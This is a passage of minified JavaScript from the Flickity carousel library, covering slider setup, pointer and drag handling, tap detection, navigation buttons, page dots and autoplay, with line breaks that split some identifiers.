ype)}}(window,function(t,e,i,n,o,r,s,a){function l(t,e)
{for(t=r.makeArray(t);t.length;)e.appendChild(t.shift())}function h(t,e){var
i=r.getQueryElement(t);return i?(this.element=i,c&&(this.
$element=c(this.element)),this.options=r.extend({},this.constructor.defaults),this.option(e),void
this._create()):void(p&&p.error("Bad element for Flickity: "+(i||t)))}var
c=t.jQuery,d=t.getComputedStyle,p=t.console,u=0,f={};h.defaults={accessibility:!
0,cellAlign:"center",freeScrollFriction:.075,friction:.28,percentPosition:!0,resize:!
0,selectedAttraction:.025,setGallerySize:!
0},h.createMethods=[],r.extend(h.prototype,i.prototype),h.prototype._create=function(){var
e=this.guid=++u;this.element.flickityGUID=e,f[e]=this,this.selectedIndex=this.options.initialIndex||
0,this.restingFrames=0,this.x=0,this.velocity=0,this.accel=0,this.originSide=this.options.rightToLeft?"
right":"left",this.viewport=document.createElement("div"),this.viewport.className="flickity-
viewport",h.setUnselectable(this.viewport),this._createSlider(),(this.options.resize||
this.options.watchCSS)&&(n.bind(t,"resize",this),this.isResizeBound=!0);for(var
i=0,o=h.createMethods.length;o>i;i++){var r=h.createMethods[i];this[r]()}this.options.watchCSS?
this.watchCSS():this.activate()},h.prototype.option=function(t)
{r.extend(this.options,t)},h.prototype.activate=function(){if(!this.isActive){this.isActive=!
0,e.add(this.element,"flickity-enabled"),this.options.rightToLeft&&e.add(this.element,"flickity-
rtl");var
t=this._filterFindCellElements(this.element.children);l(t,this.slider),this.viewport.appendChild(this.sli
der),this.element.appendChild(this.viewport),this.getSize(),this.reloadCells(),this.setGallerySize(),this
.options.accessibility&&(this.element.tabIndex=0,n.bind(this.element,"keydown",this)),this.emit("ac
tivate"),this.positionSliderAtSelected(),this.select(this.selectedIndex)}},h.prototype._createSlider=fu
nction(){var t=document.createElement("div");t.className="flickity-
slider",t.style[this.originSide]=0,this.slider=t},h.prototype._filterFindCellElements=function(t){return
r.filterFindElements(t,this.options.cellSelector)},h.prototype.reloadCells=function()
{this.cells=this._makeCells(this.slider.children),this.positionCells(),this._getWrapShiftCells(),this.setG
allerySize()},h.prototype._makeCells=function(t){for(var
e=this._filterFindCellElements(t),i=[],n=0,o=e.length;o>n;n++){var r=e[n],a=new
s(r,this);i.push(a)}return i},h.prototype.getLastCell=function(){return this.cells[this.cells.length-
1]},h.prototype.positionCells=function()
{this._sizeCells(this.cells),this._positionCells(0)},h.prototype._positionCells=function(t)
{this.maxCellHeight=t?this.maxCellHeight||0:0;var e=0;if(t>0){var i=this.cells[t-
1];e=i.x+i.size.outerWidth}for(var n,o=this.cells.length,r=t;o>r;r+
+)n=this.cells[r],n.setPosition(e),e+=n.size.outerWidth,this.maxCellHeight=Math.max(n.size.outerHei
ght,this.maxCellHeight);this.slideableWidth=e,this._containCells()},h.prototype._sizeCells=function(t)
{for(var e=0,i=t.length;i>e;e++){var
n=t[e];n.getSize()}},h.prototype._init=h.prototype.reposition=function()
{this.positionCells(),this.positionSliderAtSelected()},h.prototype.getSize=function()
{this.size=o(this.element),this.setCellAlign(),this.cursorPosition=this.size.innerWidth*this.cellAlign};v
ar v={center:{left:.5,right:.5},left:{left:0,right:1},right:
{right:0,left:1}};h.prototype.setCellAlign=function(){var t=v[this.options.cellAlign];this.cellAlign=t?
t[this.originSide]:this.options.cellAlign},h.prototype.setGallerySize=function()
{this.options.setGallerySize&&(this.viewport.style.height=this.maxCellHeight+"px")},h.prototype._ge
tWrapShiftCells=function(){if(this.options.wrapAround)
{this._unshiftCells(this.beforeShiftCells),this._unshiftCells(this.afterShiftCells);var
t=this.cursorPosition,e=this.cells.length-1;this.beforeShiftCells=this._getGapCells(t,e,-
1),t=this.size.innerWidth-
this.cursorPosition,this.afterShiftCells=this._getGapCells(t,0,1)}},h.prototype._getGapCells=function(
t,e,i){for(var n=[];t>0;){var o=this.cells[e];if(!o)break;n.push(o),e+=i,t-=o.size.outerWidth}return
n},h.prototype._containCells=function(){if(this.options.contain&&!
this.options.wrapAround&&this.cells.length)for(var
t=this.options.rightToLeft?"marginRight":"marginLeft",e=this.options.rightToLeft?"marginLeft":"mar
ginRight",i=this.cells[0].size[t],n=this.getLastCell(),o=this.slideableWidth-n.size[e],r=o-
this.size.innerWidth*(1-this.cellAlign),s=o<this.size.innerWidth,a=0,l=this.cells.length;l>a;a++){var
h=this.cells[a];h.setDefaultTarget(),s?h.target=o*this.cellAlign:
(h.target=Math.max(h.target,this.cursorPosition+i),h.target=Math.min(h.target,r))}},h.prototype.disp
atchEvent=function(t,e,i){var n=[e].concat(i);if(this.emitEvent(t,n),c&&this.$element)if(e){var
o=c.Event(e);o.type=t,this.$element.trigger(o,i)}else this.
$element.trigger(t,i)},h.prototype.select=function(t,e){if(this.isActive){var
i=this.cells.length;this.options.wrapAround&&i>1&&(0>t?this.x-
=this.slideableWidth:t>=i&&(this.x+=this.slideableWidth)),(this.options.wrapAround||
e)&&(t=r.modulo(t,i)),this.cells[t]&&(this.selectedIndex=t,this.setSelectedCell(),this.startAnimation()
,this.dispatchEvent("cellSelect"))}},h.prototype.previous=function(t){this.select(this.selectedIndex-
1,t)},h.prototype.next=function(t)
{this.select(this.selectedIndex+1,t)},h.prototype.setSelectedCell=function()
{this._removeSelectedCellClass(),this.selectedCell=this.cells[this.selectedIndex],this.selectedElement
=this.selectedCell.element,e.add(this.selectedElement,"is-
selected")},h.prototype._removeSelectedCellClass=function()
{this.selectedCell&&e.remove(this.selectedCell.element,"is-
selected")},h.prototype.getCell=function(t){for(var e=0,i=this.cells.length;i>e;e++){var
n=this.cells[e];if(n.element==t)return n}},h.prototype.getCells=function(t){t=r.makeArray(t);for(var
e=[],i=0,n=t.length;n>i;i++){var o=t[i],s=this.getCell(o);s&&e.push(s)}return
e},h.prototype.getCellElements=function(){for(var t=[],e=0,i=this.cells.length;i>e;e+
+)t.push(this.cells[e].element);return t},h.prototype.getParentCell=function(t){var
e=this.getCell(t);return e?e:(t=r.getParent(t,".flickity-slider >
*"),this.getCell(t))},h.prototype.uiChange=function()
{this.emit("uiChange")},h.prototype.childUIPointerDown=function(t)
{this.emitEvent("childUIPointerDown",[t])},h.prototype.onresize=function()
{this.watchCSS(),this.resize()},r.debounceMethod(h,"onresize",150),h.prototype.resize=function()
{this.isActive&&(this.getSize(),this.options.wrapAround&&(this.x=r.modulo(this.x,this.slideableWidt
h)),this.positionCells(),this._getWrapShiftCells(),this.setGallerySize(),this.positionSliderAtSelected())};
var y=h.supportsConditionalCSS=function(){var t;return function(){if(void 0!==t)return t;if(!d)return
void(t=!1);var e=document.createElement("style"),i=document.createTextNode('body:after
{ content: "foo"; display: none; }');e.appendChild(i),document.head.appendChild(e);var
n=d(document.body,":after").content;return t=-1!
=n.indexOf("foo"),document.head.removeChild(e),t}}();h.prototype.watchCSS=function(){var
t=this.options.watchCSS;if(t){var e=y();if(!e){var i="fallbackOn"==t?"activate":"deactivate";return
void this[i]()}var n=d(this.element,":after").content;-1!=n.indexOf("flickity")?
this.activate():this.deactivate()}},h.prototype.onkeydown=function(t){if(this.options.accessibility&&(!
document.activeElement||document.activeElement==this.element))if(37==t.keyCode){var
e=this.options.rightToLeft?"next":"previous";this.uiChange(),this[e]()}else if(39==t.keyCode){var
i=this.options.rightToLeft?"previous":"next";this.uiChange(),this[i]
()}},h.prototype.deactivate=function(){if(this.isActive){e.remove(this.element,"flickity-
enabled"),e.remove(this.element,"flickity-rtl");for(var t=0,i=this.cells.length;i>t;t++){var
o=this.cells[t];o.destroy()}this._removeSelectedCellClass(),this.element.removeChild(this.viewport),l(
this.slider.children,this.element),this.options.accessibility&&(this.element.removeAttribute("tabInde
x"),n.unbind(this.element,"keydown",this)),this.isActive=!
1,this.emit("deactivate")}},h.prototype.destroy=function()
{this.deactivate(),this.isResizeBound&&n.unbind(t,"resize",this),this.emit("destroy"),c&&this.
$element&&c.removeData(this.element,"flickity"),delete this.element.flickityGUID,delete
f[this.guid]},r.extend(h.prototype,a);var g="attachEvent"in t;return h.setUnselectable=function(t)
{g&&t.setAttribute("unselectable","on")},h.data=function(t){t=r.getQueryElement(t);var
e=t&&t.flickityGUID;return
e&&f[e]},r.htmlInit(h,"flickity"),c&&c.bridget&&c.bridget("flickity",h),h.Cell=s,h}),function(t,e)
{"function"==typeof define&&define.amd?define("unipointer/unipointer",
["eventEmitter/EventEmitter","eventie/eventie"],function(i,n){return e(t,i,n)}):"object"==typeof
exports?module.exports=e(t,require("wolfy87-
eventemitter"),require("eventie")):t.Unipointer=e(t,t.EventEmitter,t.eventie)}(window,function(t,e,i)
{function n(){}function o(){}o.prototype=new e,o.prototype.bindStartEvent=function(t)
{this._bindStartEvent(t,!0)},o.prototype.unbindStartEvent=function(t){this._bindStartEvent(t,!
1)},o.prototype._bindStartEvent=function(e,n){n=void 0===n?!0:!!n;var
o=n?"bind":"unbind";t.navigator.pointerEnabled?i[o]
(e,"pointerdown",this):t.navigator.msPointerEnabled?i[o](e,"MSPointerDown",this):(i[o]
(e,"mousedown",this),i[o](e,"touchstart",this))},o.prototype.handleEvent=function(t){var
e="on"+t.type;this[e]&&this[e](t)},o.prototype.getTouch=function(t){for(var e=0,i=t.length;i>e;e++)
{var n=t[e];if(n.identifier==this.pointerIdentifier)return n}},o.prototype.onmousedown=function(t)
{var e=t.button;e&&0!==e&&1!==e||this._pointerDown(t,t)},o.prototype.ontouchstart=function(t)
{this._pointerDown(t,t.changedTouches[0])},o.prototype.onMSPointerDown=o.prototype.onpointer
down=function(t){this._pointerDown(t,t)},o.prototype._pointerDown=function(t,e)
{this.isPointerDown||(this.isPointerDown=!0,this.pointerIdentifier=void 0!==e.pointerId?
e.pointerId:e.identifier,this.pointerDown(t,e))},o.prototype.pointerDown=function(t,e)
{this._bindPostStartEvents(t),this.emitEvent("pointerDown",[this,t,e])};var r={mousedown:
["mousemove","mouseup"],touchstart:["touchmove","touchend","touchcancel"],pointerdown:
["pointermove","pointerup","pointercancel"],MSPointerDown:
["MSPointerMove","MSPointerUp","MSPointerCancel"]};return
o.prototype._bindPostStartEvents=function(e){if(e){for(var n=r[e.type],o=e.preventDefault?
t:document,s=0,a=n.length;a>s;s++){var
l=n[s];i.bind(o,l,this)}this._boundPointerEvents={events:n,node:o}}},o.prototype._unbindPostStartEv
ents=function(){var t=this._boundPointerEvents;if(t&&t.events){for(var
e=0,n=t.events.length;n>e;e++){var o=t.events[e];i.unbind(t.node,o,this)}delete
this._boundPointerEvents}},o.prototype.onmousemove=function(t)
{this._pointerMove(t,t)},o.prototype.onMSPointerMove=o.prototype.onpointermove=function(t)
{t.pointerId==this.pointerIdentifier&&this._pointerMove(t,t)},o.prototype.ontouchmove=function(t)
{var
e=this.getTouch(t.changedTouches);e&&this._pointerMove(t,e)},o.prototype._pointerMove=functio
n(t,e){this.pointerMove(t,e)},o.prototype.pointerMove=function(t,e){this.emitEvent("pointerMove",
[this,t,e])},o.prototype.onmouseup=function(t)
{this._pointerUp(t,t)},o.prototype.onMSPointerUp=o.prototype.onpointerup=function(t)
{t.pointerId==this.pointerIdentifier&&this._pointerUp(t,t)},o.prototype.ontouchend=function(t){var
e=this.getTouch(t.changedTouches);e&&this._pointerUp(t,e)},o.prototype._pointerUp=function(t,e)
{this._pointerDone(),this.pointerUp(t,e)},o.prototype.pointerUp=function(t,e)
{this.emitEvent("pointerUp",[this,t,e])},o.prototype._pointerDone=function(){this.isPointerDown=!
1,delete
this.pointerIdentifier,this._unbindPostStartEvents(),this.pointerDone()},o.prototype.pointerDone=n,
o.prototype.onMSPointerCancel=o.prototype.onpointercancel=function(t)
{t.pointerId==this.pointerIdentifier&&this._pointerCancel(t,t)},o.prototype.ontouchcancel=function(
t){var
e=this.getTouch(t.changedTouches);e&&this._pointerCancel(t,e)},o.prototype._pointerCancel=functi
on(t,e){this._pointerDone(),this.pointerCancel(t,e)},o.prototype.pointerCancel=function(t,e)
{this.emitEvent("pointerCancel",[this,t,e])},o.getPointerPoint=function(t){return{x:void 0!==t.pageX?
t.pageX:t.clientX,y:void 0!==t.pageY?t.pageY:t.clientY}},o}),function(t,e){"function"==typeof
define&&define.amd?define("unidragger/unidragger",
["eventie/eventie","unipointer/unipointer"],function(i,n){return e(t,i,n)}):"object"==typeof exports?
module.exports=e(t,require("eventie"),require("unipointer")):t.Unidragger=e(t,t.eventie,t.Unipointer
)}(window,function(t,e,i){function n(){}function o(t){t.preventDefault?
t.preventDefault():t.returnValue=!1}function r(t){for(;t!
=document.body;)if(t=t.parentNode,"A"==t.nodeName)return t}function s(){}function a(){return!
1}s.prototype=new i,s.prototype.bindHandles=function(){this._bindHandles(!
0)},s.prototype.unbindHandles=function(){this._bindHandles(!1)};var
l=t.navigator;s.prototype._bindHandles=function(t){t=void 0===t?!0:!!t;var i;i=l.pointerEnabled?
function(e){e.style.touchAction=t?"none":""}:l.msPointerEnabled?function(e)
{e.style.msTouchAction=t?"none":""}:function(){t&&c(s)};for(var
n=t?"bind":"unbind",o=0,r=this.handles.length;r>o;o++){var
s=this.handles[o];this._bindStartEvent(s,t),i(s),e[n](s,"click",this)}};var h="attachEvent"in
document.documentElement,c=h?function(t){"IMG"==t.nodeName&&(t.ondragstart=a);for(var
e=t.querySelectorAll("img"),i=0,n=e.length;n>i;i++){var
o=e[i];o.ondragstart=a}}:n,d=s.allowTouchstartNodes={INPUT:!0,A:!0,BUTTON:!0,SELECT:!0};return
s.prototype.pointerDown=function(t,e){this._dragPointerDown(t,e);var
i=document.activeElement;i&&i.blur&&i.blur(),this._bindPostStartEvents(t),this.emitEvent("pointer
Down",[this,t,e])},s.prototype._dragPointerDown=function(t,e)
{this.pointerDownPoint=i.getPointerPoint(e);var
n=t.target.nodeName,s="touchstart"==t.type&&(d[n]||r(t.target));s||"SELECT"==n||
o(t)},s.prototype.pointerMove=function(t,e){var
i=this._dragPointerMove(t,e);this.emitEvent("pointerMove",
[this,t,e,i]),this._dragMove(t,e,i)},s.prototype._dragPointerMove=function(t,e){var
n=i.getPointerPoint(e),o={x:n.x-this.pointerDownPoint.x,y:n.y-this.pointerDownPoint.y};return!
this.isDragging&&this.hasDragStarted(o)&&this._dragStart(t,e),o},s.prototype.hasDragStarted=functi
on(t){return Math.abs(t.x)>3||Math.abs(t.y)>3},s.prototype.pointerUp=function(t,e)
{this.emitEvent("pointerUp",
[this,t,e]),this._dragPointerUp(t,e)},s.prototype._dragPointerUp=function(t,e){this.isDragging?
this._dragEnd(t,e):this._staticClick(t,e)},s.prototype._dragStart=function(t,e){this.isDragging=!
0,this.dragStartPoint=s.getPointerPoint(e),this.isPreventingClicks=!
0,this.dragStart(t,e)},s.prototype.dragStart=function(t,e){this.emitEvent("dragStart",
[this,t,e])},s.prototype._dragMove=function(t,e,i)
{this.isDragging&&this.dragMove(t,e,i)},s.prototype.dragMove=function(t,e,i)
{this.emitEvent("dragMove",[this,t,e,i])},s.prototype._dragEnd=function(t,e){this.isDragging=!1;var
i=this;setTimeout(function(){delete
i.isPreventingClicks}),this.dragEnd(t,e)},s.prototype.dragEnd=function(t,e){this.emitEvent("dragEnd",
[this,t,e])},s.prototype.onclick=function(t)
{this.isPreventingClicks&&o(t)},s.prototype._staticClick=function(t,e)
{"INPUT"==t.target.nodeName&&"text"==t.target.type&&t.target.focus(),this.staticClick(t,e)

},s.prototype.staticClick=function(t,e){this.emitEvent("staticClick",
[this,t,e])},s.getPointerPoint=function(t){return{x:void 0!==t.pageX?t.pageX:t.clientX,y:void 0!
==t.pageY?t.pageY:t.clientY}},s.getPointerPoint=i.getPointerPoint,s}),function(t,e)
{"function"==typeof define&&define.amd?define("flickity/js/drag",
["classie/classie","eventie/eventie","./flickity","unidragger/unidragger","fizzy-ui-
utils/utils"],function(i,n,o,r,s){return e(t,i,n,o,r,s)}):"object"==typeof exports?
module.exports=e(t,require("desandro-
classie"),require("eventie"),require("./flickity"),require("unidragger"),require("fizzy-ui-utils")):
(t.Flickity=t.Flickity||
{},t.Flickity.dragPrototype=e(t,t.classie,t.eventie,t.Flickity,t.Unidragger,t.fizzyUIUtils))}
(window,function(t,e,i,n,o,r){function s(t){t.preventDefault?t.preventDefault():t.returnValue=!
1}function a(e){var i=o.getPointerPoint(e);return i.y-t.pageYOffset}r.extend(n.defaults,{draggable:!
0,touchVerticalScroll:!0}),n.createMethods.push("_createDrag");var
l={};r.extend(l,o.prototype),l._createDrag=function()
{this.on("activate",this.bindDrag),this.on("uiChange",this._uiChangeDrag),this.on("childUIPointerDo
wn",this._childUIPointerDownDrag),this.on("deactivate",this.unbindDrag)},l.bindDrag=function()
{this.options.draggable&&!this.isDragBound&&(e.add(this.element,"is-
draggable"),this.handles=[this.viewport],this.bindHandles(),this.isDragBound=!
0)},l.unbindDrag=function(){this.isDragBound&&(e.remove(this.element,"is-
draggable"),this.unbindHandles(),delete this.isDragBound)},l.hasDragStarted=function(t){return
Math.abs(t.x)>3},l._uiChangeDrag=function(){delete
this.isFreeScrolling},l._childUIPointerDownDrag=function(t)
{s(t),this.pointerDownFocus(t)},l.pointerDown=function(t,i){this._dragPointerDown(t,i);var
n=document.activeElement;n&&n.blur&&n!
=this.element&&n.blur(),this.pointerDownFocus(t),this.velocity=0,e.add(this.viewport,"is-pointer-
down"),this._bindPostStartEvents(t),this.dispatchEvent("pointerDown",t,[i])};var h={touchstart:!
0,MSPointerDown:!0},c={INPUT:!0,SELECT:!0};l.pointerDownFocus=function(t){!
this.options.accessibility||h[t.type]||c[t.target.nodeName]||
this.element.focus()},l.pointerMove=function(t,e){var
i=this._dragPointerMove(t,e);this.touchVerticalScrollMove(t,e,i),this._dragMove(t,e,i),this.dispatchE
vent("pointerMove",t,[e,i])},l.pointerUp=function(t,i){delete
this.isTouchScrolling,e.remove(this.viewport,"is-pointer-down"),this.dispatchEvent("pointerUp",t,
[i]),this._dragPointerUp(t,i)};var d={touchmove:!0,MSPointerMove:!0};return
l.touchVerticalScrollMove=function(e,i,n){if(this.options.touchVerticalScroll&&d[e.type]&&(!
this.isTouchScrolling&&Math.abs(n.y)>16&&(this.startScrollY=t.pageYOffset,this.pointerWindowStar
tY=a(i),this.isTouchScrolling=!0),this.isTouchScrolling)){var o=this.pointerWindowStartY-
a(i),r=this.startScrollY+o;t.scroll(t.pageXOffset,r)}},l.dragStart=function(t,e)
{this.dragStartPosition=this.x,this.startAnimation(),this.dispatchEvent("dragStart",t,
[e])},l.dragMove=function(t,e,i){this.previousDragX=this.x;var n=i.x,o=this.options.rightToLeft?-
1:1;if(this.x=this.dragStartPosition+n*o,!this.options.wrapAround&&this.cells.length){var
r=Math.max(-this.cells[0].target,this.dragStartPosition);this.x=this.x>r?.5*(this.x-r)+r:this.x;var
s=Math.min(-this.getLastCell().target,this.dragStartPosition);this.x=this.x<s?.5*(this.x-s)
+s:this.x}this.previousDragMoveTime=this.dragMoveTime,this.dragMoveTime=new
Date,this.dispatchEvent("dragMove",t,[e,i])},l.dragEnd=function(t,e)
{this.dragEndFlick(),this.options.freeScroll&&(this.isFreeScrolling=!0);var
i=this.dragEndRestingSelect();if(this.options.freeScroll&&!this.options.wrapAround){var
n=this.getRestingPosition();this.isFreeScrolling=-n>this.cells[0].target&&-
n<this.getLastCell().target}else this.options.freeScroll||i!=this.selectedIndex||
(i+=this.dragEndBoostSelect());this.select(i),this.dispatchEvent("dragEnd",t,
[e])},l.dragEndFlick=function(){if(isFinite(this.previousDragX)){var t=this.dragMoveTime-
this.previousDragMoveTime;if(t){t/=1e3/60;var e=this.x-this.previousDragX;this.velocity=e/t}delete
this.previousDragX}},l.dragEndRestingSelect=function(){var
t=this.getRestingPosition(),e=Math.abs(this.getCellDistance(-
t,this.selectedIndex)),i=this._getClosestResting(t,e,1),n=this._getClosestResting(t,e,-
1),o=i.distance<n.distance?i.index:n.index;return this.options.contain&&!
this.options.wrapAround&&(o=Math.abs(o-this.selectedIndex)<=1?
this.selectedIndex:o),o},l._getClosestResting=function(t,e,i){for(var
n=this.selectedIndex,o=1/0,r=this.options.contain&&!this.options.wrapAround?function(t,e){return
e>=t}:function(t,e){return e>t};r(e,o)&&(n+=i,o=e,e=this.getCellDistance(-t,n),null!
==e);)e=Math.abs(e);return{distance:o,index:n-i}},l.getCellDistance=function(t,e){var
i=this.cells.length,n=this.options.wrapAround&&i>1,o=n?r.modulo(e,i):e,s=this.cells[o];if(!s)return
null;var a=n?this.slideableWidth*Math.floor(e/i):0;return t-
(s.target+a)},l.dragEndBoostSelect=function(){var t=this.getCellDistance(-
this.x,this.selectedIndex);return t>0&&this.velocity<-1?1:0>t&&this.velocity>1?-
1:0},l.staticClick=function(t,e){var
i=this.getParentCell(t.target),n=i&&i.element,o=i&&r.indexOf(this.cells,i);this.dispatchEvent("staticCl
ick",t,[e,n,o])},r.extend(n.prototype,l),n}),function(t,e){"function"==typeof define&&define.amd?
define("tap-listener/tap-listener",["unipointer/unipointer"],function(i){return
e(t,i)}):"object"==typeof exports?
module.exports=e(t,require("unipointer")):t.TapListener=e(t,t.Unipointer)}(window,function(t,e)
{function i(t){this.bindTap(t)}i.prototype=new e,i.prototype.bindTap=function(t)
{t&&(this.unbindTap(),this.tapElement=t,this._bindStartEvent(t,!
0))},i.prototype.unbindTap=function(){this.tapElement&&(this._bindStartEvent(this.tapElement,!
0),delete this.tapElement)};var n=void 0!==t.pageYOffset;return i.prototype.pointerUp=function(i,o)
{var r=e.getPointerPoint(o),s=this.tapElement.getBoundingClientRect(),a=n?
t.pageXOffset:document.body.scrollLeft,l=n?
t.pageYOffset:document.body.scrollTop,h=r.x>=s.left+a&&r.x<=s.right+a&&r.y>=s.top+l&&r.y<=s.bo
ttom+l;h&&this.emitEvent("tap",[this,i,o])},i.prototype.destroy=function()
{this.pointerDone(),this.unbindTap()},i}),function(t,e){"function"==typeof define&&define.amd?
define("flickity/js/prev-next-button",["eventie/eventie","./flickity","tap-listener/tap-listener","fizzy-
ui-utils/utils"],function(i,n,o,r){return e(t,i,n,o,r)}):"object"==typeof exports?
module.exports=e(t,require("eventie"),require("./flickity"),require("tap-listener"),require("fizzy-ui-
utils")):(t.Flickity=t.Flickity||
{},t.Flickity.PrevNextButton=e(t,t.eventie,t.Flickity,t.TapListener,t.fizzyUIUtils))}
(window,function(t,e,i,n,o){function r(t,e){this.direction=t,this.parent=e,this._create()}var
s="http://www.w3.org/2000/svg",a=function(){function t(){if(void 0!==e)return e;var
t=document.createElement("div");return
t.innerHTML="<svg/>",e=(t.firstChild&&t.firstChild.namespaceURI)==s}var e;return t}();return
r.prototype=new n,r.prototype._create=function(){this.isEnabled=!0,this.isPrevious=-
1==this.direction;var t=this.parent.options.rightToLeft?1:-1;this.isLeft=this.direction==t;var
e=this.element=document.createElement("button");if(e.className="flickity-prev-next-
button",e.className+=this.isPrevious?" previous":"
next",e.setAttribute("type","button"),i.setUnselectable(e),a()){var
n=this.createSVG();e.appendChild(n)}else this.setArrowText(),e.className+=" no-svg";var
o=this;this.onCellSelect=function()
{o.update()},this.parent.on("cellSelect",this.onCellSelect),this.on("tap",this.onTap),this.on("pointerD
own",function(t,e){o.parent.childUIPointerDown(e)})},r.prototype.activate=function()
{this.update(),this.bindTap(this.element),e.bind(this.element,"click",this),this.parent.element.appen
dChild(this.element)},r.prototype.deactivate=function()
{this.parent.element.removeChild(this.element),n.prototype.destroy.call(this),e.unbind(this.element
,"click",this)},r.prototype.createSVG=function(){var
t=document.createElementNS(s,"svg");t.setAttribute("viewBox","0 0 100 100");var
e=document.createElementNS(s,"path");e.setAttribute("d","M 50,0 L 60,10 L 20,50 L 60,90 L 50,100
L 0,50 Z"),e.setAttribute("class","arrow");var i=this.isLeft?"translate(15,0)":"translate(85,100)
rotate(180)";return
e.setAttribute("transform",i),t.appendChild(e),t},r.prototype.setArrowText=function(){var
t=this.parent.options,e=this.isLeft?
t.leftArrowText:t.rightArrowText;o.setText(this.element,e)},r.prototype.onTap=function()
{if(this.isEnabled){this.parent.uiChange();var t=this.isPrevious?"previous":"next";this.parent[t]
()}},r.prototype.handleEvent=o.handleEvent,r.prototype.onclick=function(){var
t=document.activeElement;t&&t==this.element&&this.onTap()},r.prototype.enable=function()
{this.isEnabled||(this.element.disabled=!1,this.isEnabled=!0)},r.prototype.disable=function()
{this.isEnabled&&(this.element.disabled=!0,this.isEnabled=!1)},r.prototype.update=function(){var
t=this.parent.cells;if(this.parent.options.wrapAround&&t.length>1)return void this.enable();var
e=t.length?t.length-1:0,i=this.isPrevious?
0:e,n=this.parent.selectedIndex==i?"disable":"enable";this[n]()},r.prototype.destroy=function()
{this.deactivate()},o.extend(i.defaults,{prevNextButtons:!
0,leftArrowText:"‹",rightArrowText:"›"}),i.createMethods.push("_createPrevNextButtons"),i.prototy
pe._createPrevNextButtons=function(){this.options.prevNextButtons&&(this.prevButton=new r(-
1,this),this.nextButton=new
r(1,this),this.on("activate",this.activatePrevNextButtons))},i.prototype.activatePrevNextButtons=func
tion()
{this.prevButton.activate(),this.nextButton.activate(),this.on("deactivate",this.deactivatePrevNextBu
ttons)},i.prototype.deactivatePrevNextButtons=function()
{this.prevButton.deactivate(),this.nextButton.deactivate(),this.off("deactivate",this.deactivatePrevNe
xtButtons)},i.PrevNextButton=r,r}),function(t,e){"function"==typeof define&&define.amd?
define("flickity/js/page-dots",["eventie/eventie","./flickity","tap-listener/tap-listener","fizzy-ui-
utils/utils"],function(i,n,o,r){return e(t,i,n,o,r)}):"object"==typeof exports?
module.exports=e(t,require("eventie"),require("./flickity"),require("tap-listener"),require("fizzy-ui-
utils")):(t.Flickity=t.Flickity||{},t.Flickity.PageDots=e(t,t.eventie,t.Flickity,t.TapListener,t.fizzyUIUtils))}
(window,function(t,e,i,n,o){function r(t){this.parent=t,this._create()}return r.prototype=new
n,r.prototype._create=function()
{this.holder=document.createElement("ol"),this.holder.className="flickity-page-
dots",i.setUnselectable(this.holder),this.dots=[];var t=this;this.onCellSelect=function()
{t.updateSelected()},this.parent.on("cellSelect",this.onCellSelect),this.on("tap",this.onTap),this.on("p
ointerDown",function(e,i){t.parent.childUIPointerDown(i)})},r.prototype.activate=function()
{this.setDots(),this.updateSelected(),this.bindTap(this.holder),this.parent.element.appendChild(this.
holder)},r.prototype.deactivate=function()
{this.parent.element.removeChild(this.holder),n.prototype.destroy.call(this)},r.prototype.setDots=fu
nction(){var t=this.parent.cells.length-this.dots.length;t>0?this.addDots(t):0>t&&this.removeDots(-
t)},r.prototype.addDots=function(t){for(var e=document.createDocumentFragment(),i=[];t;){var
n=document.createElement("li");n.className="dot",e.appendChild(n),i.push(n),t--}this.holder.appe
ndChild(e),this.dots=this.dots.concat(i)},r.prototype.removeDots=function(t){for(var
e=this.dots.splice(this.dots.length-t,t),i=0,n=e.length;n>i;i++){var
o=e[i];this.holder.removeChild(o)}},r.prototype.updateSelected=function()
{this.selectedDot&&(this.selectedDot.className="dot"),this.dots.length&&(this.selectedDot=this.do
ts[this.parent.selectedIndex],this.selectedDot.className="dot is-
selected")},r.prototype.onTap=function(t,e){var i=e.target;if("LI"==i.nodeName)
{this.parent.uiChange();var
n=o.indexOf(this.dots,i);this.parent.select(n)}},r.prototype.destroy=function()
{this.deactivate()},i.PageDots=r,o.extend(i.defaults,{pageDots:!
0}),i.createMethods.push("_createPageDots"),i.prototype._createPageDots=function()
{this.options.pageDots&&(this.pageDots=new
r(this),this.on("activate",this.activatePageDots),this.on("cellAddedRemoved",this.onCellAddedRemo
vedPageDots),this.on("deactivate",this.deactivatePageDots))},i.prototype.activatePageDots=function
(){this.pageDots.activate()},i.prototype.onCellAddedRemovedPageDots=function()
{this.pageDots.setDots()},i.prototype.deactivatePageDots=function()
{this.pageDots.deactivate()},i.PageDots=r,r}),function(t,e){"function"==typeof define&&define.amd?
define("flickity/js/player",["eventEmitter/EventEmitter","eventie/eventie","./flickity"],function(t,i,n)
{return e(t,i,n)}):"object"==typeof exports?module.exports=e(require("wolfy87-
eventemitter"),require("eventie"),require("./flickity")):(t.Flickity=t.Flickity||
{},t.Flickity.Player=e(t.EventEmitter,t.eventie,t.Flickity))}(window,function(t,e,i){function n(t)
{if(this.isPlaying=!1,this.parent=t,r){var e=this;this.onVisibilityChange=function()
{e.visibilityChange()}}}var o,r;return"hidden"in document?
(o="hidden",r="visibilitychange"):"webkitHidden"in
document&&(o="webkitHidden",r="webkitvisibilitychange"),n.prototype=new
t,n.prototype.play=function(){this.isPlaying=!0,delete
this.isPaused,r&&document.addEventListener(r,this.onVisibilityChange,!
1),this.tick()},n.prototype.tick=function(){if(this.isPlaying&&!this.isPaused){this.tickTime=new
Date;var t=this.parent.options.autoPlay;t="number"==typeof t?t:3e3;var
e=this;this.timeout=setTimeout(function(){e.parent.next(!0),e.tick()},t)}},n.prototype.stop=function()
{this.isPlaying=!1,delete
this.isPaused,this.clear(),r&&document.removeEventListener(r,this.onVisibilityChange,!
1)},n.prototype.clear=function(){clearTimeout(this.timeout)},n.prototype.pause=function()
{this.isPlaying&&(this.isPaused=!0,this.clear())},n.prototype.unpause=function()
{this.isPaused&&this.play()},n.prototype.visibilityChange=function(){var
t=document[o];this[t?"pause":"unpause"]
()},i.createMethods.push("_createPlayer"),i.prototype._createPlayer=function(){this.player=new
n(this),this.on("activate",this.activatePlayer),this.on("uiChange",this.stopPlayer),this.on("pointerDo
wn",this.stopPlayer),this.on("deactivate",this.deactivatePlayer)},i.prototype.activatePlayer=function(
)
{this.options.autoPlay&&(this.player.play(),e.bind(this.element,"mouseenter",this),this.isMouseente
rBound=!0)},i.prototype.stopPlayer=function()
{this.player.stop()},i.prototype.deactivatePlayer=function()
{this.player.stop(),this.isMouseenterBound&&(e.unbind(this.element,"mouseenter",this),delete
this.isMouseenterBound)},i.prototype.onmouseenter=function()
